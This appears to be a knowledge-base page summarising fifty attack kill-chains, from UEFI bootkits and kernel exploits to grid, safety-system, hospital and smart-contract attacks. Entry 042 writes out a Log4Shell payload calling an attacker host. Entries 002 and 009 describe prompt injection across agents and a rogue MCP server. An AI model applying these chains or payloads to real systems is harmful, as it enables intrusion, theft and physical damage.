Attack paths
Community-reviewed graphs of pentest kill-chains, each stepping from initial access through to impact.
Nº 001 - 6 steps
LogoFAIL → UEFI bootkit → persistent ring-0
Drop a malformed JPG/PNG/BMP into the EFI partition's boot logo path. Vulnerable vendor UEFI parses it pre-OS, executes attacker code before SecureBoot's verifier — install a bootkit that survives wipe + reinstall.
- Evade
- IA
- Persist
Filed by AD Knowledge Base
Nº 002 - 6 steps
Multi-agent confused-deputy → tool-call escalation
User-facing agent has limited tools; back-end planning agent has powerful tools (shell, file system). Prompt injection in user input → user agent → back-end agent. The back-end runs the attacker's intent under the planner's higher trust.
- Exec
- Exfil
- IA
- PrivEsc
Filed by AD Knowledge Base
Nº 003 - 6 steps
Cloudflare account compromise → Worker rewrite → mass cred theft
Phish a Cloudflare account belonging to a popular site operator. Deploy a Worker that injects JS into every response, capturing form posts (logins, payments) for as long as the operator doesn't notice.
- Coll
- Evade
- Exfil
- Impact
- IA
Filed by AD Knowledge Base
Nº 004 - 6 steps
Origin IP bypass → direct attack on backend
Find the real origin IP behind the CDN via CT logs / DNS history / SSL fingerprinting. Connect directly to origin, bypassing WAF + caching + rate-limit; run noisy attacks (SQLi / RCE) that the edge would have blocked.
- Coll
- Evade
- Exfil
- Recon
Filed by AD Knowledge Base
Nº 005 - 6 steps
Subdomain takeover → ACME DNS-01 → trusted cert for victim host
Find a dangling CNAME / NS record. Claim the underlying resource; complete Let's Encrypt's DNS-01 challenge for the parent hostname. The attacker now holds a publicly trusted cert for victim.example.com and can chain it into AITM.
- CredAcc
- IA
Filed by AD Knowledge Base
Nº 006 - 6 steps
Compromised root CA → arbitrary cert issuance → silent MITM
Compromise the private key (or signing process) of a publicly-trusted root or intermediate. Issue an unlogged cert for the target hostname; use it for invisible TLS MITM until CT-log monitoring or revocation catches up.
- CredAcc
- Lat-Move
- Recon
Filed by AD Knowledge Base
Nº 007 - 6 steps
Industroyer2 IEC-104 substation hijack
A timed payload speaks IEC-60870-5-104 to substation RTUs at an attacker-chosen hour; it sends 'open breaker' commands across a substation, blacking out a grid section.
- Disco
- Exec
- Impact
- IA
Filed by AD Knowledge Base
Nº 008 - 5 steps
TRITON-class SIS reprogram → disable safety shutdown
After OT-network foothold, reach a Triconex Safety Instrumented System. Download attacker logic that suppresses safety trips on a process that's about to be pushed past its safe envelope.
- Impact
- Lat-Move
Filed by AD Knowledge Base
Nº 009 - 6 steps
Malicious MCP server → silent supply chain for agent tools
User installs an MCP server marketed as a useful integration. Every subsequent agent session has the rogue server in scope — its tools log prompts, exfil files, or inject responses to bias the agent.
- Coll
- Exec
- Impact
- IA
- ResDev
Filed by AD Knowledge Base
Nº 010 - 5 steps
5G core GTP-U user-plane injection → subscriber MITM
The attacker sits on a transit network between mobile-core hops (or holds a compromised UPF). GTP-U packets are typically unfiltered between PEs, so packets can be injected into subscriber bearers — credential capture, free-of-charge tunnels, downstream attacks.
- CredAcc
- IA
- Lat-Move
Filed by AD Knowledge Base
Nº 011 - 5 steps
IMSI catcher → force 2G downgrade → SMS / call intercept
Operate a rogue base station in the target area. Phones associate; force fallback to 2G, where no mutual auth is required. Intercept SMS OTPs and sniff voice calls; push notifications fail silently.
- Coll
- CredAcc
- IA
- ResDev
Filed by AD Knowledge Base
Nº 012 - 6 steps
Evil maid → sniff TPM unseal → decrypt BitLocker offline
Brief physical access to a TPM-only BitLocker laptop. Plug a logic analyser onto the LPC / SPI bus; capture the FVEK as the TPM unseals it at boot. Take the disk home, decrypt offline.
- CredAcc
- Disco
- Exfil
- IA
Filed by AD Knowledge Base
Nº 013 - 6 steps
io_uring UAF → modprobe_path overwrite → root
Use an io_uring UAF to land arbitrary kernel write, repoint /proc/sys/kernel/modprobe to an attacker binary, then trigger a kernel auto-modprobe — runs the binary as root.
- Exec
- IA
- PrivEsc
Filed by AD Knowledge Base
Nº 014 - 5 steps
Vesting beneficiary replace → silently drain stream
Bug in a custom vesting contract allows anyone to call setBeneficiary on existing schedules. Replace beneficiary with attacker address; legitimate token stream now flows to attacker until released funds are noticed.
- Exfil
- Impact
- IA
- PrivEsc
- Recon
Filed by AD Knowledge Base
Nº 015 - 6 steps
SNMPv2c write-community → router config exfil → cred sprays
Find a router with 'private' RW community. Trigger SNMP-to-TFTP config download to attacker host. The config has RADIUS shared secret, AAA server IP, ISAKMP PSKs, and SSH user-pubkeys — spray harvested creds.
- Coll
- CredAcc
- Disco
- PrivEsc
Filed by AD Knowledge Base
Nº 016 - 5 steps
Renderer compromise → GPU process → vulnerable kernel driver
After renderer RCE, talk to the GPU process via IPC. GPU process sends ioctls to a vulnerable graphics driver — full kernel R/W; ring0 from a web page.
- Evade
- IA
- PrivEsc
Filed by AD Knowledge Base
Nº 017 - 5 steps
Flash-loan veCRV → capture Curve gauge → emission redirect
Snapshot voting on Curve gauges uses veCRV balance at a specific block. Borrow large CRV via flash-loan, lock for max veCRV, vote in attacker pool's favour, unlock (or accept the limit) — emissions redirected for the epoch.
- Exfil
- Impact
- PrivEsc
Filed by AD Knowledge Base
Nº 018 - 7 steps
nf_tables UAF → kernel R/W → root
CVE-2024-1086-class nf_tables UAF reachable from a user namespace. Win the race with userfaultfd to land an attacker object in the freed slot, build a kernel R/W primitive, overwrite the current task's cred struct.
- Exec
- IA
- PrivEsc
Filed by AD Knowledge Base
Nº 019 - 6 steps
Stolen credentials → no-MFA Snowflake → mass tenant exfil (2024)
Infostealer logs from third-party machines yielded credentials for many Snowflake tenants. Tenants without enforced MFA / IP allow-lists were directly queried; dozens of customer data sets exfiltrated.
- CredAcc
- Disco
- Exfil
- Impact
- Recon
Filed by AD Knowledge Base
Nº 020 - 5 steps
Mifare Classic crack → cloned hotel key
Many hotel / corporate door systems still use Mifare Classic. Capture nonces during normal use, recover the Crypto-1 key with mfoc / mfcuk, write to a 'magic UID' card — full access to the property.
- CredAcc
- IA
Filed by AD Knowledge Base
Nº 021 - 7 steps
Dev workstation → cloud backup keys → encrypted vault store (LastPass 2022)
Attacker compromised a single LastPass DevOps engineer's home machine via outdated Plex Media Server, harvested AWS keys for the encrypted-vault backup bucket, exfiltrated production vault data.
- Coll
- CredAcc
- IA
- Recon
Filed by AD Knowledge Base
Nº 022 - 5 steps
WAF SSRF → IMDS → S3 mass exfil (Capital One 2019)
A misconfigured ModSecurity rule on a customer-facing app allowed SSRF; SSRF hit EC2 IMDSv1 for the instance role; the role had ListBucket + GetObject on a major customer-data bucket.
- Coll
- CredAcc
- IA
- Lat-Move
Filed by AD Knowledge Base
Nº 023 - 5 steps
BGP prefix hijack → traffic interception
From a compliant origin AS, announce a more-specific or origin-spoofed prefix belonging to the victim. Internet routing converges on the attacker AS; traffic for that prefix flows through the attacker for inspection / DoS.
- CredAcc
- Lat-Move
- ResDev
Filed by AD Knowledge Base
Nº 024 - 6 steps
Mass SMS phish → Okta-style portal → SaaS sprawl (0ktapus)
Wide SMS phishing campaign targeting employees of ~130 organisations with a single phishlet that captures Okta credentials + push approval. Mass automated logins to Twilio, MailChimp, DoorDash et al.
- Exfil
- IA
- Recon
- ResDev
Filed by AD Knowledge Base
Nº 025 - 6 steps
Apple Pay Express Transit relay → high-value contactless fraud
Specific configuration (Express Transit + Visa) allowed contactless transactions over £1k without unlock or per-tx auth. Two devices relayed the wallet from victim's pocket to a real terminal.
- Exfil
- Impact
- IA
- Lat-Move
Filed by AD Knowledge Base
Nº 026 - 7 steps
V8 type-confusion 1-day → renderer RCE
Public V8 type-confusion turned into a renderer pop. JS triggers JIT into mis-compiling a polymorphic site, addrof/fakeobj primitives, shellcode in a WASM RWX page.
- Exec
- IA
- Persist
- PrivEsc
Filed by AD Knowledge Base
Nº 027 - 5 steps
ERC-4337 paymaster sponsor drain
A paymaster sponsors all UserOperations without per-user gas accounting. Spam tiny UserOps from many bundled addresses — paymaster pays the gas until its deposit hits zero.
- Impact
- IA
- Recon
Filed by AD Knowledge Base
Nº 028 - 5 steps
ERC-4626 first-depositor inflation → drain new deposits
Be the first depositor with 1 wei → mint 1 share. Send tokens directly to the vault to inflate share price. Every subsequent depositor's amount, integer-divided by the inflated rate, rounds to zero shares.
- Exfil
- Impact
- IA
Filed by AD Knowledge Base
Nº 029 - 6 steps
AMSI patch → in-memory .NET / PowerShell stager
Patch AmsiScanBuffer in amsi.dll → return clean for any content. Subsequent PowerShell / Office VBA / .NET runtime calls emit attacker code without scanning.
- C2
- Evade
- IA
- Persist
Filed by AD Knowledge Base
Nº 030 - 6 steps
Leaked legacy VPN credential → ransomware (Colonial-class)
A dormant VPN account whose password appeared in a third-party breach is still active and has no MFA enforced. Sign in, recon AD, deploy ransomware across the estate.
- CredAcc
- Disco
- Impact
- IA
- PrivEsc
Filed by AD Knowledge Base
Nº 031 - 6 steps
Trusted updater hijack → wormable destructive payload (NotPetya / M.E.Doc)
Compromise a niche third-party vendor (regional tax software, niche industry tooling). Push a malicious update; every customer auto-installs it. Payload spreads via SMB + Mimikatz, wipes drives.
- Exec
- Impact
- IA
Filed by AD Knowledge Base
Nº 032 - 7 steps
Vish helpdesk → Okta MFA reset → admin → ransomware (MGM-class)
Identify an Okta admin via LinkedIn. Vish the helpdesk pretending to be that admin, get MFA reset. Sign in, plant attacker MFA factor, then push policy changes that disable MFA for chosen apps before mass-deploying ransomware.
- CredAcc
- Impact
- IA
- Persist
- PrivEsc
Filed by AD Knowledge Base
Nº 033 - 7 steps
Build-system implant → signed supply-chain backdoor (SolarWinds-class)
Compromise the target vendor's build server. A small implant rewrites a single source file at compile time — every official signed release downstream now ships the backdoor.
- C2
- IA
- Persist
- Recon
Filed by AD Knowledge Base
Nº 034 - 5 steps
Insider admin panel coercion → mass account takeover (Twitter 2020)
Identify employees with access to an internal admin panel. SE / coerce one to use the panel to change target accounts' email + 2FA, then take them over.
- CredAcc
- Exfil
- IA
- Recon
Filed by AD Knowledge Base
Nº 035 - 6 steps
Process hollowing → run beacon in svchost shell
Spawn svchost.exe suspended, unmap its image, write attacker PE into the same address space, resume — the process keeps a legit-looking PEB and command line but executes beacon code.
- C2
- Evade
- IA
Filed by AD Knowledge Base
Nº 036 - 6 steps
Process doppelgänging → spawn signed image with attacker bytes
Use NTFS transactional file APIs to overlay an attacker image during process creation. The final mapped process differs from the on-disk file — AV sees only the legit signed image at scan time.
- Evade
- Exec
- IA
Filed by AD Knowledge Base
Nº 037 - 5 steps
BYOVD → kernel-level disable of EDR callbacks
From local admin, load a signed-but-vulnerable driver. Use its kernel primitive to walk the EDR's PsSetCreateProcessNotifyRoutine entries and unlink them — EDR stops receiving events while still 'running'.
- CredAcc
- Evade
- Exec
- IA
Filed by AD Knowledge Base
Nº 038 - 5 steps
MITM HL7 v2 → tamper lab orders / results
HL7 v2 over MLLP is plaintext pipe-delimited. From the same VLAN as the lab analyser ↔ EHR link, MITM and rewrite OBX result segments — changes the patient's documented test result.
- CredAcc
- Impact
- IA
Filed by AD Knowledge Base
Nº 039 - 5 steps
Unauth DICOM PACS → mass medical-image exfil
PACS server accepts unauthenticated C-FIND / C-MOVE on port 104 / 11112. Query for every study, pull every image — exfil hundreds of thousands of patient scans + DICOM metadata (PII).
- Coll
- Disco
- Exfil
Filed by AD Knowledge Base
Nº 040 - 6 steps
Spring4Shell (CVE-2022-22965) → JSP webshell on Tomcat
Send a crafted POST that uses Spring's data-binding to mutate Tomcat's logging configuration — turn its access log into a JSP file written under webapps/, then request it.
- CredAcc
- Exec
- Persist
- Recon
Filed by AD Knowledge Base
Nº 041 - 6 steps
MOVEit Transfer (CVE-2023-34362) → mass data exfil (Cl0p)
Pre-auth SQLi in MOVEit's web UI forges an admin session. .NET deserialisation chain drops a webshell as SYSTEM. Cl0p's 2023 mass-exfil playbook: download every file under /var/files.
- Exec
- Exfil
- Impact
- IA
- Persist
Filed by AD Knowledge Base
Nº 042 - 6 steps
Log4Shell (CVE-2021-44228) → RCE → lateral
Send `${jndi:ldap://attacker/x}` in any logged field (User-Agent / X-Forwarded-For). Vulnerable log4j 2.x resolves the JNDI URL, fetches a Java class from attacker LDAP, runs it as the app user.
- CredAcc
- Exec
- IA
- Recon
- ResDev
Filed by AD Knowledge Base
Nº 043 - 5 steps
Apache Struts S2-045 (CVE-2017-5638) → Equifax-style breach
Crafted Content-Type header is parsed as OGNL — execute commands as the app user. The 2017 Equifax breach origin: unpatched Struts endpoint exposed to the internet.
- CredAcc
- Exec
- Exfil
- IA
- Recon
Filed by AD Knowledge Base
Nº 044 - 5 steps
EternalBlue (MS17-010) → SMBv1 wormable spread
Unpatched Windows 7 / Server 2008 with SMBv1 enabled — pre-auth kernel RCE. Used by WannaCry / NotPetya in 2017, still found on enclave / industrial networks.
- CredAcc
- Disco
- Exec
- IA
- Lat-Move
Filed by AD Knowledge Base
Nº 045 - 4 steps
Uninitialised UUPS proxy implementation → brick contracts
UUPS upgradeable contracts must initialise the implementation contract itself. If skipped, anyone can call `initialise()` and become its owner — then call `selfdestruct` to brick every proxy referencing it (Parity Multisig 2017).
- Impact
- PrivEsc
- Recon
Filed by AD Knowledge Base
Nº 046 - 5 steps
MEV bot honeypot → drain searcher
Plant a transaction that looks like easy arbitrage in the public mempool. The MEV searcher bot front-runs into a trap contract whose 'profit' function reverts and seizes the searcher's gas + funds.
- Exfil
- Impact
- IA
Filed by AD Knowledge Base
Nº 047 - 6 steps
z/OS TN3270 → RACF userID brute → mainframe shell
Internet-/intranet-exposed TN3270 mainframe terminal. Userids follow predictable HR scheme. Brute-force passwords; many environments allow short / dictionary passwords for legacy reasons.
- CredAcc
- Disco
- Exec
- IA
- PrivEsc
Filed by AD Knowledge Base
Nº 048 - 5 steps
SAML signature wrapping (XSW) → impersonate admin
Capture a legitimate SAML response. Re-arrange the XML so the IdP's signature still validates against the original assertion, but the SP parses an attacker-injected assertion claiming Admin.
- CredAcc
- Exfil
- IA
- Lat-Move
- PrivEsc
Filed by AD Knowledge Base
Nº 049 - 6 steps
FIDO2 caBLE hybrid → phone authenticator hijack
Attacker phishing site shows the legitimate FIDO2 QR. Victim scans with their phone authenticator. The link completes the WebAuthn ceremony in the attacker's browser — they're now signed in as the victim.
- Coll
- CredAcc
- IA
Filed by AD Knowledge Base
Nº 050 - 5 steps
BACnet HVAC → disrupt building operations
BACnet on UDP/47808 is unauthenticated. From a foothold in corporate IT, write to HVAC controllers — over-cool a data centre, disable smoke evacuation, mess with elevators.
- CredAcc
- Disco
- Impact
Filed by AD Knowledge Base